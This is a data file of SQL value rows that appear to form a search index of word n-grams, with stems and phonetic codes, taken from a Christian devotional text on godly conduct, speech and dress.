(277667, 'according to jesus', 'accord to jesus', 0, 1, 1.6, 'A2635232', 1, '*'),
(277668, 'act all', 'act all', 0, 1, 1.2333, 'A234', 1, '*'),
(277669, 'act all the', 'act all the', 0, 1, 1.3667, 'A2343', 1, '*'),
(277670, 'act like', 'act like', 0, 1, 1.2667, 'A2342', 1, '*'),
(277671, 'act like god', 'act like god', 0, 1, 1.4, 'A23423', 1, '*'),
(277672, 'acting', 'act', 0, 0, 0.4, 'A2352', 1, '*'),
(277673, 'acting like', 'act like', 0, 1, 1.3667, 'A235242', 1, '*'),
(277674, 'acting like god', 'act like god', 0, 1, 1.5, 'A2352423', 1, '*'),
(277675, 'actually making', 'actual making', 0, 1, 1.5, 'A2345252', 1, '*'),
(277676, 'actually making him', 'actual making him', 0, 1, 1.6333, 'A23452525', 1, '*'),
(277677, 'afford to look', 'afford to look', 0, 1, 1.4667, 'A16342', 1, '*'),
(277678, 'all it really', 'all it really', 0, 1, 1.4333, 'A4364', 1, '*'),
(277679, 'all men', 'all men', 0, 1, 1.2333, 'A450', 1, '*'),
(277680, 'all men b', 'all men b', 0, 1, 1.3, 'A451', 1, '*'),
(277681, 'all sorts', 'all sorts', 0, 1, 1.3, 'A42632', 1, '*'),
(277682, 'all sorts of', 'all sorts of', 0, 1, 1.4, 'A426321', 1, '*'),
(277683, 'all the time', 'all the time', 0, 1, 1.4, 'A435', 1, '*'),
(277684, 'all those things', 'all those things', 0, 1, 1.5333, 'A432352', 1, '*'),
(277685, 'all times for', 'all times for', 0, 1, 1.4333, 'A435216', 1, '*'),
(277686, 'all times iii', 'all times iii', 0, 1, 1.4333, 'A4352', 1, '*'),
(277687, 'allowing you', 'allow you', 0, 1, 1.4, 'A452', 1, '*'),
(277688, 'allowing you to', 'allow you to', 0, 1, 1.5, 'A4523', 1, '*'),
(277689, 'also as', 'also as', 0, 1, 1.2333, 'A420', 1, '*'),
(277690, 'also as a', 'also as a', 0, 1, 1.3, 'A420', 1, '*'),
(277691, 'also showcase', 'also showcase', 0, 1, 1.4333, 'A420', 1, '*'),
(277692, 'also showcase that', 'also showcase that', 0, 1, 1.6, 'A423', 1, '*'),
(277693, 'also you mustn\'t', 'also you mustn', 0, 1, 1.5333, 'A4252353', 1, '*'),
(277694, 'although they', 'although they', 0, 1, 1.4333, 'A4323', 1, '*'),
(277695, 'although they think', 'although they think', 0, 1, 1.6333, 'A432352', 1, '*'),
(277696, 'although they were', 'although they were', 0, 1, 1.6, 'A43236', 1, '*'),
(277697, 'although your', 'although your', 0, 1, 1.4333, 'A4326', 1, '*'),
(277698, 'although your physical', 'although your physical', 0, 1, 1.7333, 'A4326124', 1, '*'),
(277699, 'always represent', 'alwai represent', 0, 1, 1.5333, 'A42616253', 1, '*'),
(277700, 'always represent god', 'alwai represent god', 0, 1, 1.6667, 'A4261625323', 1, '*'),
(277701, 'always treat others', 'alwai treat others', 0, 1, 1.6333, 'A4236362', 1, '*'),
(277702, 'an inch', 'an inch', 0, 1, 1.2333, 'A520', 1, '*'),
(277703, 'an inch in', 'an inch in', 0, 1, 1.3333, 'A525', 1, '*'),
(277704, 'an outflow', 'an outflow', 0, 1, 1.3333, 'A5314', 1, '*'),
(277705, 'an outflow of', 'an outflow of', 0, 1, 1.4333, 'A53141', 1, '*'),
(277706, 'and a sense', 'and a sense', 0, 1, 1.3667, 'A53252', 1, '*'),
(277707, 'and according', 'and according', 0, 1, 1.4333, 'A5326352', 1, '*'),
(277708, 'and according to', 'and according to', 0, 1, 1.5333, 'A53263523', 1, '*'),
(277709, 'and both', 'and both', 0, 1, 1.2667, 'A5313', 1, '*'),
(277710, 'and both of', 'and both of', 0, 1, 1.3667, 'A53131', 1, '*'),
(277711, 'and breathe', 'and breathe', 0, 1, 1.3667, 'A53163', 1, '*'),
(277712, 'and breathe how', 'and breathe how', 0, 1, 1.5, 'A53163', 1, '*'),
(277713, 'and bringglory', 'and bringglory', 0, 1, 1.4667, 'A53165246', 1, '*'),
(277714, 'and bringglory to', 'and bringglory to', 0, 1, 1.5667, 'A531652463', 1, '*'),
(277715, 'and compassion', 'and compassion', 0, 1, 1.4667, 'A5325125', 1, '*'),
(277716, 'and compassion for', 'and compassion for', 0, 1, 1.6, 'A532512516', 1, '*'),
(277717, 'and fellowshipping', 'and fellowshipping', 0, 1, 1.6, 'A53142152', 1, '*'),
(277718, 'and fellowshipping with', 'and fellowshipping with', 0, 1, 1.7667, 'A531421523', 1, '*'),
(277719, 'and getting', 'and getting', 0, 1, 1.3667, 'A532352', 1, '*'),
(277720, 'and getting everything', 'and getting everything', 0, 1, 1.7333, 'A53235216352', 1, '*'),
(277721, 'and godly', 'and godly', 0, 1, 1.3, 'A53234', 1, '*'),
(277722, 'and godly majority', 'and godly majority', 0, 1, 1.6, 'A532345263', 1, '*'),
(277723, 'and gone', 'and gone', 0, 1, 1.2667, 'A5325', 1, '*'),
(277724, 'and gone his', 'and gone his', 0, 1, 1.4, 'A53252', 1, '*'),
(277725, 'and he knows', 'and he knows', 0, 1, 1.4, 'A53252', 1, '*'),
(277726, 'and how much', 'and how much', 0, 1, 1.4, 'A5352', 1, '*'),
(277727, 'and light and', 'and light and', 0, 1, 1.4333, 'A5342353', 1, '*'),
(277728, 'and martha', 'and martha', 0, 1, 1.3333, 'A53563', 1, '*'),
(277729, 'and martha luke', 'and martha luke', 0, 1, 1.5, 'A5356342', 1, '*'),
(277730, 'and martha\'s', 'and martha', 0, 1, 1.4, 'A535632', 1, '*'),
(277731, 'and martha\'s house', 'and martha house', 0, 1, 1.6, 'A535632', 1, '*'),
(277732, 'and other moral', 'and other moral', 0, 1, 1.5, 'A536564', 1, '*'),
(277733, 'and people god', 'and people god', 0, 1, 1.4667, 'A531423', 1, '*'),
(277734, 'and personal', 'and personal', 0, 1, 1.4, 'A5316254', 1, '*'),
(277735, 'and personal walk', 'and personal walk', 0, 1, 1.5667, 'A53162542', 1, '*'),
(277736, 'and pray', 'and pray', 0, 1, 1.2667, 'A5316', 1, '*'),
(277737, 'and pray in', 'and pray in', 0, 1, 1.3667, 'A53165', 1, '*'),
(277738, 'and resist', 'and resist', 0, 1, 1.3333, 'A53623', 1, '*'),
(277739, 'and resist the', 'and resist the', 0, 1, 1.4667, 'A53623', 1, '*'),
(277740, 'and respect', 'and respect', 0, 1, 1.3667, 'A5362123', 1, '*'),
(277741, 'and respect god', 'and respect god', 0, 1, 1.5, 'A536212323', 1, '*'),
(277742, 'and should', 'and should', 0, 1, 1.3333, 'A53243', 1, '*'),
(277743, 'and should be', 'and should be', 0, 1, 1.4333, 'A532431', 1, '*'),
(277744, 'and show', 'and show', 0, 1, 1.2667, 'A532', 1, '*'),
(277745, 'and show them', 'and show them', 0, 1, 1.4333, 'A53235', 1, '*'),
(277746, 'and swear', 'and swear', 0, 1, 1.3, 'A5326', 1, '*'),
(277747, 'and swear wordsthat', 'and swear wordsthat', 0, 1, 1.6333, 'A5326323', 1, '*'),
(277748, 'and the confession', 'and the confession', 0, 1, 1.6, 'A5325125', 1, '*'),
(277749, 'and unbroken', 'and unbroken', 0, 1, 1.4, 'A5351625', 1, '*'),
(277750, 'and unbroken occultic', 'and unbroken occultic', 0, 1, 1.7, 'A53516252432', 1, '*'),
(277751, 'and wretched', 'and wretched', 0, 1, 1.4, 'A536323', 1, '*'),
(277752, 'and wretched god', 'and wretched god', 0, 1, 1.5333, 'A53632323', 1, '*'),
(277753, 'another classic', 'anoth classic', 0, 1, 1.5, 'A536242', 1, '*'),
(277754, 'another classic example', 'anoth classic example', 0, 1, 1.7667, 'A536242514', 1, '*'),
(277755, 'another danger', 'anoth danger', 0, 1, 1.4667, 'A5363526', 1, '*'),
(277756, 'another danger of', 'anoth danger of', 0, 1, 1.5667, 'A53635261', 1, '*'),
(277757, 'any dress', 'ani dress', 0, 1, 1.3, 'A5362', 1, '*'),
(277758, 'any dress that', 'ani dress that', 0, 1, 1.4667, 'A53623', 1, '*'),
(277759, 'any of those', 'ani of those', 0, 1, 1.4, 'A5132', 1, '*'),
(277760, 'any sense', 'ani sense', 0, 1, 1.3, 'A5252', 1, '*'),
(277761, 'any sense of', 'ani sense of', 0, 1, 1.4, 'A52521', 1, '*'),
(277762, 'anything in', 'anyth in', 0, 1, 1.3667, 'A53525', 1, '*'),
(277763, 'anything in your', 'anyth in your', 0, 1, 1.5333, 'A535256', 1, '*'),
(277764, 'appear seductive', 'appear seductive', 0, 1, 1.5333, 'A1623231', 1, '*'),
(277765, 'appear seductive rough', 'appear seductive rough', 0, 1, 1.7333, 'A162323162', 1, '*'),
(277766, 'appearance at', 'appear at', 0, 1, 1.4333, 'A16523', 1, '*'),
(277767, 'appearance at all', 'appear at all', 0, 1, 1.5667, 'A165234', 1, '*'),
(277768, 'applies to women', 'appli to women', 0, 1, 1.5333, 'A14235', 1, '*'),
(277769, 'approves', 'approv', 0, 0, 0.5333, 'A1612', 1, '*'),
(277770, 'approves romans', 'approv romans', 0, 1, 1.5, 'A1612652', 1, '*'),
(277771, 'approves romans 12', 'approv romans 12', 0, 1, 1.6, 'A1612652', 1, '*'),
(277772, 'are actually', 'ar actually', 0, 1, 1.4, 'A6234', 1, '*'),
(277773, 'are actually making', 'ar actually making', 0, 1, 1.6333, 'A62345252', 1, '*'),
(277774, 'are christians', 'ar christians', 0, 1, 1.4667, 'A6262352', 1, '*'),
(277775, 'are christians you', 'ar christians you', 0, 1, 1.6, 'A6262352', 1, '*'),
(277776, 'are expected', 'ar expected', 0, 1, 1.4, 'A62123', 1, '*'),
(277777, 'are expected to', 'ar expected to', 0, 1, 1.5, 'A62123', 1, '*'),
(277778, 'are from', 'ar from', 0, 1, 1.2667, 'A6165', 1, '*'),
(277779, 'are from the', 'ar from the', 0, 1, 1.4, 'A61653', 1, '*'),
(277780, 'are not having', 'ar not having', 0, 1, 1.4667, 'A653152', 1, '*'),
(277781, 'are so contaminated', 'ar so contaminated', 0, 1, 1.6333, 'A625353', 1, '*'),
(277782, 'are to god', 'ar to god', 0, 1, 1.3333, 'A6323', 1, '*'),
(277783, 'are to think', 'ar to think', 0, 1, 1.4, 'A6352', 1, '*'),
(277784, 'aren\'t', 'aren', 0, 0, 0.4, 'A653', 1, '*'),
(277785, 'aren\'t expected', 'aren expected', 0, 1, 1.5, 'A6532123', 1, '*'),
(277786, 'aren\'t expected to', 'aren expected to', 0, 1, 1.6, 'A6532123', 1, '*'),
(277787, 'as a reflection', 'as a reflection', 0, 1, 1.5, 'A2614235', 1, '*'),
(277788, 'as a tool', 'as a tool', 0, 1, 1.3, 'A234', 1, '*'),
(277789, 'as christians you', 'as christians you', 0, 1, 1.5667, 'A262352', 1, '*'),
(277790, 'as easy', 'as easy', 0, 1, 1.2333, 'A200', 1, '*'),
(277791, 'as easy as', 'as easy as', 0, 1, 1.3333, 'A200', 1, '*'),
(277792, 'as holy', 'as holy', 0, 1, 1.2333, 'A240', 1, '*'),
(277793, 'as holy as', 'as holy as', 0, 1, 1.3333, 'A242', 1, '*'),
(277794, 'as important', 'as important', 0, 1, 1.4, 'A2516353', 1, '*'),
(277795, 'as important as', 'as important as', 0, 1, 1.5, 'A25163532', 1, '*'),
(277796, 'as possible in', 'as possible in', 0, 1, 1.4667, 'A212145', 1, '*'),
(277797, 'as secret', 'as secret', 0, 1, 1.3, 'A263', 1, '*'),
(277798, 'as secret sins', 'as secret sins', 0, 1, 1.4667, 'A263252', 1, '*'),
(277799, 'as seen', 'as seen', 0, 1, 1.2333, 'A250', 1, '*'),
(277800, 'as seen in', 'as seen in', 0, 1, 1.3333, 'A250', 1, '*'),
(277801, 'as seen when', 'as seen when', 0, 1, 1.4, 'A250', 1, '*'),
(277802, 'as the main', 'as the main', 0, 1, 1.3667, 'A235', 1, '*'),
(277803, 'as this sounds', 'as this sounds', 0, 1, 1.4667, 'A232532', 1, '*'),
(277804, 'at in', 'at in', 0, 1, 1.1667, 'A350', 1, '*'),
(277805, 'at in becoming', 'at in becoming', 0, 1, 1.4667, 'A351252', 1, '*'),
(277806, 'at once don\'t', 'at once don', 0, 1, 1.4333, 'A352353', 1, '*'),
(277807, 'at the cost', 'at the cost', 0, 1, 1.3667, 'A323', 1, '*'),
(277808, 'at this statement', 'at this statement', 0, 1, 1.5667, 'A32353', 1, '*'),
(277809, 'at what it', 'at what it', 0, 1, 1.3333, 'A300', 1, '*'),
(277810, 'at which', 'at which', 0, 1, 1.2667, 'A320', 1, '*'),
(277811, 'at which you', 'at which you', 0, 1, 1.4, 'A320', 1, '*'),
(277812, 'attend church', 'attend church', 0, 1, 1.4333, 'A353262', 1, '*'),
(277813, 'attend church on', 'attend church on', 0, 1, 1.5333, 'A3532625', 1, '*'),
(277814, 'attitudes', 'attitud', 0, 0, 0.6, 'A320', 1, '*'),
(277815, 'attitudes to', 'attitud to', 0, 1, 1.4, 'A323', 1, '*'),
(277816, 'attitudes to the', 'attitud to the', 0, 1, 1.5333, 'A323', 1, '*'),
(277817, 'authority as', 'author as', 0, 1, 1.4, 'A3632', 1, '*'),
(277818, 'authority as a', 'author as a', 0, 1, 1.4667, 'A3632', 1, '*'),
(277819, 'avoid the danger', 'avoid the danger', 0, 1, 1.5333, 'A13526', 1, '*'),
(277820, 'aware', 'awar', 0, 0, 0.3333, 'A600', 1, '*'),
(277821, 'aware this', 'awar this', 0, 1, 1.3333, 'A632', 1, '*'),
(277822, 'aware this sounds', 'awar this sounds', 0, 1, 1.5667, 'A632532', 1, '*'),
(277823, 'away from your', 'awai from your', 0, 1, 1.4667, 'A1656', 1, '*'),
(277824, 'b talk', 'b talk', 0, 1, 1.2, 'B342', 1, '*'),
(277825, 'b talk like', 'b talk like', 0, 1, 1.3667, 'B34242', 1, '*'),
(277826, 'backbite', 'backbit', 0, 0, 0.5333, 'B213', 1, '*'),
(277827, 'backbite or', 'backbit or', 0, 1, 1.3667, 'B2136', 1, '*'),
(277828, 'backbite or complain', 'backbit or complain', 0, 1, 1.6667, 'B213625145', 1, '*'),
(277829, 'basis', 'basi', 0, 0, 0.3333, 'B200', 1, '*'),
(277830, 'basis obey', 'basi obey', 0, 1, 1.3333, 'B210', 1, '*'),
(277831, 'basis obey the', 'basi obey the', 0, 1, 1.4667, 'B213', 1, '*'),
(277832, 'be a successful', 'be a successful', 0, 1, 1.5, 'B214', 1, '*'),
(277833, 'be an outflow', 'be an outflow', 0, 1, 1.4333, 'B5314', 1, '*'),
(277834, 'be careful', 'be careful', 0, 1, 1.3333, 'B2614', 3, '*'),
(277835, 'be careful that', 'be careful that', 0, 1, 1.5, 'B26143', 1, '*'),
(277836, 'be clean', 'be clean', 0, 1, 1.2667, 'B245', 1, '*'),
(277837, 'be clean and', 'be clean and', 0, 1, 1.4, 'B2453', 1, '*'),
(277838, 'be found guilty', 'be found guilty', 0, 1, 1.5, 'B53243', 1, '*'),
(277839, 'be ignored', 'be ignored', 0, 1, 1.3333, 'B2563', 1, '*'),
(277840, 'be ignored either', 'be ignored either', 0, 1, 1.5667, 'B25636', 1, '*'),
(277841, 'be not', 'be not', 0, 1, 1.2, 'B530', 1, '*'),
(277842, 'be not into', 'be not into', 0, 1, 1.3667, 'B5353', 1, '*'),
(277843, 'be profitable', 'be profitable', 0, 1, 1.4333, 'B61314', 1, '*'),
(277844, 'be profitable if', 'be profitable if', 0, 1, 1.5333, 'B613141', 1, '*'),
(277845, 'be prospering', 'be prospering', 0, 1, 1.4333, 'B621652', 1, '*'),
(277846, 'be prospering the', 'be prospering the', 0, 1, 1.5667, 'B6216523', 1, '*'),
(277847, 'be to glorify', 'be to glorify', 0, 1, 1.4333, 'B32461', 1, '*'),
(277848, 'be your lifestyle', 'be your lifestyle', 0, 1, 1.5667, 'B641234', 1, '*'),
(277849, 'because god made', 'becaus god made', 0, 1, 1.5333, 'B2353', 1, '*'),
(277850, 'because god resists', 'becaus god resists', 0, 1, 1.6333, 'B236232', 1, '*'),
(277851, 'because god wants', 'becaus god wants', 0, 1, 1.5667, 'B23532', 1, '*'),
(277852, 'because god\'s', 'becaus god', 0, 1, 1.4333, 'B232', 1, '*'),
(277853, 'because god\'s power', 'becaus god power', 0, 1, 1.6333, 'B23216', 1, '*'),
(277854, 'because you consult', 'becaus you consult', 0, 1, 1.6333, 'B25243', 1, '*'),
(277855, 'become like', 'becom like', 0, 1, 1.3667, 'B2542', 1, '*'),
(277856, 'become like god', 'becom like god', 0, 1, 1.5, 'B25423', 1, '*'),
(277857, 'become much', 'becom much', 0, 1, 1.3667, 'B252', 1, '*'),
(277858, 'become much more', 'becom much more', 0, 1, 1.5333, 'B25256', 1, '*'),
(277859, 'becoming like', 'becom like', 0, 1, 1.4333, 'B25242', 1, '*'),
(277860, 'becoming like god', 'becom like god', 0, 1, 1.5667, 'B252423', 1, '*'),
(277861, 'been like', 'been like', 0, 1, 1.3, 'B542', 1, '*'),
(277862, 'been like martha', 'been like martha', 0, 1, 1.5333, 'B542563', 1, '*'),
(277863, 'before we go', 'befor we go', 0, 1, 1.4, 'B620', 1, '*'),
(277864, 'begin to talk', 'begin to talk', 0, 1, 1.4333, 'B25342', 1, '*'),
(277865, 'begotten', 'begotten', 0, 0, 0.5333, 'B235', 1, '*'),
(277866, 'begotten son', 'begotten son', 0, 1, 1.4, 'B23525', 1, '*'),
(277867, 'begotten son to', 'begotten son to', 0, 1, 1.5, 'B235253', 1, '*'),
(277868, 'behave', 'behav', 0, 0, 0.4, 'B000', 1, '*'),
(277869, 'behave implies', 'behav implies', 0, 1, 1.4667, 'B5142', 1, '*'),
(277870, 'behave implies the', 'behav implies the', 0, 1, 1.6, 'B51423', 1, '*'),
(277871, 'behave in', 'behav in', 0, 1, 1.3, 'B500', 1, '*'),
(277872, 'behave in different', 'behav in different', 0, 1, 1.6333, 'B531653', 1, '*'),
(277873, 'behave in the', 'behav in the', 0, 1, 1.4333, 'B530', 1, '*'),
(277874, 'behaving', 'behav', 0, 0, 0.5333, 'B520', 1, '*'),
(277875, 'behaving in', 'behav in', 0, 1, 1.3667, 'B525', 1, '*'),
(277876, 'behaving in the', 'behav in the', 0, 1, 1.5, 'B5253', 1, '*'),
(277877, 'behind this', 'behind this', 0, 1, 1.3667, 'B532', 1, '*'),
(277878, 'behind this story', 'behind this story', 0, 1, 1.5667, 'B53236', 1, '*'),
(277879, 'being religious', 'be religious', 0, 1, 1.5, 'B52642', 1, '*'),
(277880, 'being religious hypocrites', 'be religious hypocrites', 0, 1, 1.8667, 'B5264212632', 1, '*'),
(277881, 'believe that', 'believ that', 0, 1, 1.4, 'B413', 1, '*'),
(277882, 'believe that when', 'believ that when', 0, 1, 1.5667, 'B4135', 1, '*'),
(277883, 'best appearance', 'best appearance', 0, 1, 1.5, 'B231652', 1, '*'),
(277884, 'best appearance at', 'best appearance at', 0, 1, 1.6, 'B2316523', 1, '*'),
(277885, 'bible didn\'t', 'bibl didn', 0, 1, 1.4, 'B4353', 1, '*'),
(277886, 'bible didn\'t say', 'bibl didn say', 0, 1, 1.5333, 'B43532', 1, '*'),
(277887, 'bible for being', 'bibl for being', 0, 1, 1.5, 'B416152', 1, '*'),
(277888, 'bible you', 'bibl you', 0, 1, 1.3, 'B400', 1, '*'),
(277889, 'bible you must', 'bibl you must', 0, 1, 1.4667, 'B4523', 1, '*'),
(277890, 'bothering', 'bother', 0, 0, 0.6, 'B3652', 1, '*'),
(277891, 'bothering you', 'bother you', 0, 1, 1.4333, 'B3652', 1, '*'),
(277892, 'bothering you such', 'bother you such', 0, 1, 1.6, 'B3652', 1, '*'),
(277893, 'breathe', 'breath', 0, 0, 0.4667, 'B630', 1, '*'),
(277894, 'breathe how', 'breath how', 0, 1, 1.3667, 'B630', 1, '*'),
(277895, 'breathe how you', 'breath how you', 0, 1, 1.5, 'B630', 1, '*'),
(277896, 'bring all', 'bring all', 0, 1, 1.3, 'B6524', 1, '*'),
(277897, 'bring all sorts', 'bring all sorts', 0, 1, 1.5, 'B65242632', 1, '*'),
(277898, 'bringglory', 'bringglori', 0, 0, 0.6667, 'B65246', 1, '*'),
(277899, 'bringglory to', 'bringglori to', 0, 1, 1.4333, 'B652463', 1, '*'),
(277900, 'bringglory to his', 'bringglori to his', 0, 1, 1.5667, 'B6524632', 1, '*'),
(277901, 'but rather', 'but rather', 0, 1, 1.3333, 'B3636', 1, '*'),
(277902, 'but rather a', 'but rather a', 0, 1, 1.4, 'B3636', 1, '*'),
(277903, 'but they would', 'but they would', 0, 1, 1.4667, 'B343', 1, '*'),
(277904, 'but to men', 'but to men', 0, 1, 1.3333, 'B350', 1, '*'),
(277905, 'but to think', 'but to think', 0, 1, 1.4, 'B352', 1, '*'),
(277906, 'but what you', 'but what you', 0, 1, 1.4, 'B300', 1, '*'),
(277907, 'by confessing', 'by confessing', 0, 1, 1.4333, 'B251252', 1, '*'),
(277908, 'by confessing what', 'by confessing what', 0, 1, 1.6, 'B2512523', 1, '*'),
(277909, 'by putting', 'by putting', 0, 1, 1.3333, 'B352', 1, '*'),
(277910, 'by putting on', 'by putting on', 0, 1, 1.4333, 'B3525', 1, '*'),
(277911, 'by worldly', 'by worldly', 0, 1, 1.3333, 'B6434', 1, '*'),
(277912, 'by worldly ways', 'by worldly ways', 0, 1, 1.5, 'B64342', 1, '*'),
(277913, 'c think', 'c think', 0, 1, 1.2333, 'C352', 1, '*'),
(277914, 'c think like', 'c think like', 0, 1, 1.4, 'C35242', 1, '*'),
(277915, 'call forth', 'call forth', 0, 1, 1.3333, 'C4163', 1, '*'),
(277916, 'call forth things', 'call forth things', 0, 1, 1.5667, 'C416352', 1, '*'),
(277917, 'came to mary', 'came to mary', 0, 1, 1.4, 'C5356', 1, '*'),
(277918, 'can\'t appear', 'can appear', 0, 1, 1.4, 'C5316', 1, '*'),
(277919, 'can\'t appear seductive', 'can appear seductive', 0, 1, 1.7333, 'C531623231', 1, '*'),
(277920, 'can\'t ever', 'can ever', 0, 1, 1.3333, 'C5316', 1, '*'),
(277921, 'can\'t ever become', 'can ever become', 0, 1, 1.5667, 'C5316125', 1, '*'),
(277922, 'careful', 'care', 0, 0, 0.4667, 'C614', 3, '*'),
(277923, 'careful that', 'care that', 0, 1, 1.4, 'C6143', 1, '*'),
(277924, 'careful that you', 'care that you', 0, 1, 1.5333, 'C6143', 1, '*'),
(277925, 'carefully the', 'carefulli the', 0, 1, 1.4333, 'C6143', 1, '*'),
(277926, 'carefully the next', 'carefulli the next', 0, 1, 1.6, 'C6143523', 1, '*'),
(277927, 'carry yourself', 'carri yourself', 0, 1, 1.4667, 'C6241', 1, '*'),
(277928, 'carry yourself in', 'carri yourself in', 0, 1, 1.5667, 'C62415', 1, '*'),
(277929, 'carry yourself with', 'carri yourself with', 0, 1, 1.6333, 'C62413', 1, '*'),
(277930, 'certain way', 'certain way', 0, 1, 1.3667, 'C635', 1, '*'),
(277931, 'certain way although', 'certain way although', 0, 1, 1.6667, 'C635432', 1, '*'),
(277932, 'challenges you\'ll', 'challeng you', 0, 1, 1.5667, 'C4524', 1, '*'),
(277933, 'challenges you\'ll have', 'challeng you have', 0, 1, 1.7333, 'C45241', 1, '*'),
(277934, 'change in', 'chang in', 0, 1, 1.3, 'C525', 1, '*'),
(277935, 'change in the', 'chang in the', 0, 1, 1.4333, 'C5253', 1, '*'),
(277936, 'choose them', 'choos them', 0, 1, 1.3667, 'C350', 1, '*'),
(277937, 'choose them carefully', 'choos them carefully', 0, 1, 1.7, 'C352614', 1, '*'),
(277938, 'christ martha', 'christ martha', 0, 1, 1.4333, 'C623563', 1, '*'),
(277939, 'christ martha represents', 'christ martha represents', 0, 1, 1.8, 'C6235636162532', 1, '*'),
(277940, 'christ worship', 'christ worship', 0, 1, 1.4667, 'C623621', 1, '*'),
(277941, 'christ worship god', 'christ worship god', 0, 1, 1.6, 'C62362123', 1, '*'),
(277942, 'christian although', 'christian although', 0, 1, 1.6, 'C6235432', 1, '*'),
(277943, 'christian although your', 'christian although your', 0, 1, 1.7667, 'C62354326', 1, '*'),
(277944, 'christian before', 'christian before', 0, 1, 1.5333, 'C623516', 1, '*'),
(277945, 'christian before we', 'christian before we', 0, 1, 1.6333, 'C623516', 1, '*'),
(277946, 'christian is to', 'christian is to', 0, 1, 1.5, 'C623523', 1, '*'),
(277947, 'christian man', 'christian man', 0, 1, 1.4333, 'C6235', 1, '*'),
(277948, 'christian man you', 'christian man you', 0, 1, 1.5667, 'C6235', 1, '*'),
(277949, 'christian romans', 'christian romans', 0, 1, 1.5333, 'C6235652', 1, '*'),
(277950, 'christian romans 12', 'christian romans 12', 0, 1, 1.6333, 'C6235652', 1, '*'),
(277951, 'christian should be', 'christian should be', 0, 1, 1.6333, 'C62352431', 1, '*'),
(277952, 'christian that prioritized', 'christian that prioritized', 0, 1, 1.8667, 'C6235316323', 1, '*'),
(277953, 'christian this', 'christian this', 0, 1, 1.4667, 'C623532', 1, '*'),
(277954, 'christian this is', 'christian this is', 0, 1, 1.5667, 'C623532', 1, '*'),
(277955, 'christian we', 'christian we', 0, 1, 1.4, 'C6235', 1, '*'),
(277956, 'christian we need', 'christian we need', 0, 1, 1.5667, 'C62353', 1, '*'),
(277957, 'christian while', 'christian while', 0, 1, 1.5, 'C62354', 1, '*'),
(277958, 'christian while mary', 'christian while mary', 0, 1, 1.6667, 'C6235456', 1, '*'),
(277959, 'christian you', 'christian you', 0, 1, 1.4333, 'C6235', 1, '*'),
(277960, 'christian you are', 'christian you are', 0, 1, 1.5667, 'C62356', 1, '*'),
(277961, 'christian you can\'t', 'christian you can', 0, 1, 1.6333, 'C6235253', 1, '*'),
(277962, 'christian you must', 'christian you must', 0, 1, 1.6, 'C623523', 1, '*'),
(277963, 'christian you\'re', 'christian you', 0, 1, 1.5333, 'C62356', 1, '*'),
(277964, 'christian you\'re expected', 'christian you expected', 0, 1, 1.8333, 'C623562123', 1, '*'),
(277965, 'christian your', 'christian your', 0, 1, 1.4667, 'C62356', 1, '*'),
(277966, 'christian your speech', 'christian your speech', 0, 1, 1.7, 'C62356212', 1, '*'),
(277967, 'christianity to', 'christian to', 0, 1, 1.5, 'C62353', 1, '*'),
(277968, 'christianity to be', 'christian to be', 0, 1, 1.6, 'C623531', 1, '*'),
(277969, 'christianity to become', 'christian to become', 0, 1, 1.7333, 'C62353125', 1, '*'),
(277970, 'christians today are', 'christian today are', 0, 1, 1.6667, 'C6235236', 1, '*'),
(277971, 'christians you', 'christian you', 0, 1, 1.4667, 'C62352', 1, '*'),
(277972, 'christians you aren\'t', 'christian you aren', 0, 1, 1.7, 'C62352653', 1, '*'),
(277973, 'christians you won\'t', 'christian you won', 0, 1, 1.6667, 'C6235253', 1, '*'),
(277974, 'church on a', 'church on a', 0, 1, 1.3667, 'C625', 1, '*'),
(277975, 'classic', 'classic', 0, 0, 0.4667, 'C420', 1, '*'),
(277976, 'classic example', 'classic example', 0, 1, 1.5, 'C42514', 1, '*'),
(277977, 'classic example of', 'classic example of', 0, 1, 1.6, 'C425141', 1, '*'),
(277978, 'clean and godly', 'clean and godly', 0, 1, 1.5, 'C453234', 1, '*'),
(277979, 'closely', 'close', 0, 0, 0.4667, 'C424', 1, '*'),
(277980, 'closely as', 'close as', 0, 1, 1.3333, 'C4242', 1, '*'),
(277981, 'closely as a', 'close as a', 0, 1, 1.4, 'C4242', 1, '*'),
(277982, 'closely at', 'close at', 0, 1, 1.3333, 'C4243', 1, '*'),
(277983, 'closely at this', 'close at this', 0, 1, 1.5, 'C42432', 1, '*'),
(277984, 'closer to god', 'closer to god', 0, 1, 1.4333, 'C426323', 1, '*'),
(277985, 'closer you', 'closer you', 0, 1, 1.3333, 'C426', 1, '*'),
(277986, 'closer you are', 'closer you are', 0, 1, 1.4667, 'C426', 1, '*'),
(277987, 'clothed', 'cloth', 0, 0, 0.4667, 'C430', 1, '*'),
(277988, 'clothed in', 'cloth in', 0, 1, 1.3333, 'C435', 1, '*'),
(277989, 'clothed in glory', 'cloth in glory', 0, 1, 1.5333, 'C435246', 1, '*'),
(277990, 'comes to dealing', 'come to dealing', 0, 1, 1.5333, 'C523452', 1, '*'),
(277991, 'comes to the', 'come to the', 0, 1, 1.4, 'C523', 1, '*'),
(277992, 'commandments and', 'command and', 0, 1, 1.5333, 'C5353253', 1, '*'),
(277993, 'commandments and other', 'command and other', 0, 1, 1.7333, 'C53532536', 1, '*'),
(277994, 'compassion', 'compass', 0, 0, 0.6667, 'C5125', 1, '*'),
(277995, 'compassion for', 'compass for', 0, 1, 1.4667, 'C512516', 1, '*'),
(277996, 'compassion for a', 'compass for a', 0, 1, 1.5333, 'C512516', 1, '*'),
(277997, 'complain and', 'complain and', 0, 1, 1.4, 'C51453', 1, '*'),
(277998, 'complain and as', 'complain and as', 0, 1, 1.5, 'C514532', 1, '*'),
(277999, 'complaining to', 'complain to', 0, 1, 1.4667, 'C514523', 1, '*'),
(278000, 'complaining to jesus', 'complain to jesus', 0, 1, 1.6667, 'C5145232', 1, '*'),
(278001, 'complaining you', 'complain you', 0, 1, 1.5, 'C51452', 1, '*'),
(278002, 'complaining you should', 'complain you should', 0, 1, 1.7333, 'C5145243', 1, '*'),
(278003, 'complex', 'complex', 0, 0, 0.4667, 'C5142', 1, '*'),
(278004, 'complex steps', 'complex steps', 0, 1, 1.4333, 'C5142312', 1, '*'),
(278005, 'complex steps when', 'complex steps when', 0, 1, 1.6, 'C51423125', 1, '*'),
(278006, 'complicate', 'complic', 0, 0, 0.6667, 'C51423', 1, '*'),
(278007, 'complicate matters', 'complic matters', 0, 1, 1.6, 'C514235362', 1, '*'),
(278008, 'complicate matters when', 'complic matters when', 0, 1, 1.7667, 'C5142353625', 1, '*'),
(278009, 'concerning your life', 'concern your life', 0, 1, 1.6667, 'C52652641', 1, '*'),
